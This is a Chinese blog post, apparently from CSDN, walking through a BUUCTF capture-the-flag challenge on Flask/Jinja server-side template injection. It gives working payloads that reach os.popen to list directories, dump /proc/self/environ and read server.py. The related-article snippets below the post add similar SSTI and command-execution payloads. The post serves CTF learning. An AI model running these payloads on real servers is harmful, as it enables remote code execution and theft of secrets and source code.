Buuctf [第三章 web进阶]SSTI 20

最新推荐文章于 2024-04-14 22:20:04 发布
最新推荐文章于 2024-04-14 22:20:04 发布
阅读量1.4k 收藏 1
点赞数
分类专栏: BUUCTF 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/CyhDl666/article/details/115004845
版权
  • 进入页面用arjun扫描一下有什么url参数
    在这里插入图片描述
  • 这道题是最基础的了
  • 直接给payload前面的payload吧
{{''.__class__.__base__.__subclasses__()[177].__init__.__globals__["__builtins__"].eval('__import__("os").popen("ls").read()')}}
  • 页面返回:password is wrong: app bin boot dev etc home lib lib64 media mnt opt proc root run sbin srv sys tmp usr var
  • 我尝试了读取当前运行环境
{{''.__class__.__base__.__subclasses__()[177].__init__.__globals__["__builtins__"].eval('__import__("os").popen("cat /proc/self/environ").read()')}}

在这里插入图片描述

  • 里面有个假的flag,真让人讨厌呀!
  • 读取前面app文件夹
{{''.__class__.__base__.__subclasses__()[177].__init__.__globals__["__builtins__"].eval('__import__("os").popen("ls /app").read()')}}
  • 返回:Dockerfile docker-compose.yml entrypoint.sh server.py
  • 读取server.py源码
{{''.__class__.__base__.__subclasses__()[177].__init__.__globals__["__builtins__"].eval('__import__("os").popen("cat /app/server.py").read()')}}
  • 得到flag~~~~
海上清辉
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ssti
2h4ox1n9
05-23 608
[第三章 web]SSTI {{"".__class__.__bases__[0].__subclasses__()}} 执行结果中找到 os命令执行类<class 'os._wrap_close'>从头开始复制到os那里,粘贴到word文档里搜索个128结果,下标127 {{"".__class__.__bases__[0].__subclasses__()[127].__init__.__globals__['popen']('ls').read()}} 列目录 ...
攻防世界web解题[](五)
weixin_46703850的博客
03-10 455
攻防世界web解题[](五) 介绍:记录解题过程 15.Web_python_template_injection(python 模板注入) 16.Web_php_unserialize( php 反序列) 17.easytornado 18.shrine(flask模板注入)
服务器模板注入 (SSTI)
since_2020的博客
09-08 279
服务器模板注入 (SSTI) 基本注入流程 ''.__class__ 显示这个东西的类 ''.__class__.base__ 找到这个的基类 ''.__class__.__base__.__subclasses__() 看基类的子类 敏感子类 popen、sys、os 因为''.__class__.__base__.__subclasses__()返回的是一个列表, 所以直接''.__class__.__base__.__subclasses__()[425]查看的就是popen这个 注意
CTF 刷题记录(二) command_execution(攻防世界)
qq_29566629的博客
07-28 1003
题目 解题分析 入网站,先ping 127.0.0.1 如图: 证明输入的指令可以在服务器里运行,然后再试试ls这种基础命令,使用“&&”命令,如图: 也可以执行。 写一个查询flag文件的脚本 import requests url = "http://220.249.52.133:30703/" list = ['bin', 'boot', 'dev', 'etc', 'home', 'lib', 'lib64', 'media', 'mnt', 'opt', 'proc',
[第三章 web ] SSTI——WP
weixin_54227009的博客
04-02 222
注:基类的子列表[127]为os(这台靶场上的python环境是127,每个python版本不一样,好比python3.9貌似没os了)4、测试是否存在模板注入url?password={{2*2}}2、入网页发现password is wrong。3、猜测password为参数。查看当前目录下有那些文件。1、题目提示为SSTI
SSTI(模板注入) 解析 和 ctf 做法
m0_56107268的博客
11-18 2589
ssti注入
全国大学生信息安全竞赛决赛web4,SSTI+TensorFlow模型.zip
08-20
全国大学生信息安全竞赛决赛web4,SSTI+TensorFlow模型.zip 全国大学生信息安全竞赛决赛web4,SSTI+TensorFlow模型.zip 全国大学生信息安全竞赛决赛web4,SSTI+TensorFlow模型.zip 全国大学生信息安全竞赛决赛web...
ssti-payload:SSTI有效载荷生成器
02-06
SSTI有效载荷发生器 该生成器是针对特定类型的Java SSTI的,其受以下启发: ${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99)....
CTF SSTI模板注入详解
weixin_47696216的博客
03-31 5603
“百度杯”CTF比赛 十一月场 Web题:Fuzz python SSTI模板注入
CTF_Web:从0学习Flask模板注入(SSTI
AFCC_的博客(Web_Dog)
08-30 3362
0x01 前言 最近在刷题的过程中发现服务端模板注入的题目也比较常见,这类注入题目都比较类似,区别就在于不同的框架、不同的过滤规则可能需要的最终payload不一样,本文将以Flask为例学习模板注入的相关知识,也是对自己学习的一个记录。 0x02 Flask简介 Flask是一个Python编写的Web 微框架,让我们可以使用Python语言快速实现一个网站或Web服务。优点就在于开发简单,代码量少,很多工作都在框架中被实现了。他与Django不同于Django是一个全能型框架,通常用于编写大型的网站。
【CTF】 SSTI模板注入漏洞
ZhangAweio的博客
05-29 711
SSTI 就是服务器端模板注入,当前使用的一些框架,比如python的flaskphp的tp,java的spring等一般都采用成熟的的MVC的模式,用户的输入先入Controller控制器,然后根据请求类型和请求的指令发送给对应Model业务模型行业务逻辑判断,数据库存取,最后把结果返回给View视图层,经过模板渲染展示给用户。
CTF-SSTI(持续更新)
m0_74317362的博客
07-27 291
SSTI
Bugku [Simple_SSTI_2](基于ctf题目学习SSTI服务器模板注入)
MAHRE_Z的博客
11-09 578
打开网址发现一串英文,提示“You need pass in a parameter named flag”(“您需要传入一个名为 flag 的参数”),根据题目提示SSTI,搜索一下SSTI,发现一篇文章介绍。显示为flag参数的值,可以知道页面会显示被传入flag参数的值,然后行报错看一看网站使用的模板类型。不错,其中有讲到什么是注入,说是格式化字符串漏洞的一种体现,然后我就又找了一篇关于。发现目录,入app目录,发现flag文件。用cat命令查看flag,得到flag。
CTF题型 SSTI(3) Smart SSTI 例题和题记
qq_39947980的博客
03-14 470
前面我们学习了Flask SSTISmart SSTI和Flask SSTI 不同Smart SSTI 是基于php的,居然可以在其中参考 Smart中文手册 https://www.smarty.net/docs/zh_CN/这里我们用 https://www.smarty.net/docs/zh_CN/language.function.eval.tpl#id456693标签{eval}执行任意php代码。
BUUCTF web3
qq_61768489的博客
05-16 953
[WUSTCTF2020]朴实无华 这题主要就是绕过php特性 , 访问假flag页面 ,响应头里有文件提示 访问后得到源码,这里怎么乱码了 逐个击破 if(intval($num)<2020&&intval($num+1)>2021) 这里使用e科学计数法, $num=123e3 intval($num)解析出来是123 满足<2020 intval($num+1) 解析出来是 123e3+1 满足...
从0到1CTFer成长之路-第三章-逻辑漏洞
黑白的博客
03-18 1487
声明 好好向大佬们学习!!! 攻击 逻辑漏洞 摘自 https://book.nu1l.com/tasks/#/ 使用BUUCTF在线环境 https://buuoj.cn/challenges 访问 http://3e95fcac-6f75-4037-82c4-b13e38bb3220.node3.buuoj.cn 是个炫酷的登录页面,本来还以为是通过任意用户注册,或者Session等,谁知道直接点提交,就能登去买书 点击提交后,看到了买书的页面 映入眼帘的三本书 第一本flag,2000块
CTF-web-ssti模板注入漏洞
最新发布
Ye的博客
04-14 837
模板引擎(这里特指用于Web开发的模板引擎)是为了使用户界面与业务数据(内容)分离而产生的,它可以生成特定格式的文档,利用模板引擎来生成前端的html代码,模板引擎会提供一套生成html代码的程序,然后只需要获取用户的数据,然后放到渲染函数里,然后生成模板+用户数据的前端html页面,然后反馈给浏览器,呈现在用户面前。SSTI 漏洞是一种常见的 Web 安全漏洞,它允许攻击者在服务器端模板引擎中注入恶意代码,导致服务器执行攻击者控制的代码,可能导致信息泄露、服务器被接管等安全问题。,那么页面上就会显示。
CTF笔记 SSTI模板注入
qq_51248658的博客
10-21 734
这次只是简单的把以前写的题目行了总结,大致明白了解题步骤,但还是得多积累一些payload,以及绕waf的方法。这个可以去找sstilab通关相关内容行学习,感觉那上面挺全的。
ctf show-web入门 SSTI篇部分题解
volcano的博客
02-04 3888
ctfshowSSTIweb361web362web363request.args传参绕过web364chr()绕过web365中括号绕过web366attr获取变量request.cookies传参web367web368 SSTI ssti模板注入基本原理推荐看这篇文章,这个师傅写的很详细,小白也很容易看懂。 web361 这个hackbar挺好用的,有现成模板,当前目录只有一个app.py,我们看一下上级目录 ?name={{ config.__class__.__init__.__globals_
buu ctf web]ssti
08-23
在buu ctf web中,ssti代表 Side Template Injection,是一种应用程序中的安全漏洞。通过此漏洞,攻击者可以注入恶意代码到服务器端的模板引擎,从而执行任意代码或获取敏感信息。这种漏洞可能导致服务器被入侵,用户数据泄露等安全问题。在比赛中,参赛者需要学习ssti的原理和常见的攻击方法,并利用它来获取目标系统的flag。在比赛中,常见的ctf题目会提供一些模板注入的挑战,参赛者需要在给定的条件下,构造合适的payload来实现攻击目标。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* *3* [(wp)ctfweb-buu中ssti模板注入](https://blog.csdn.net/qq_51862722/article/details/118685275)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值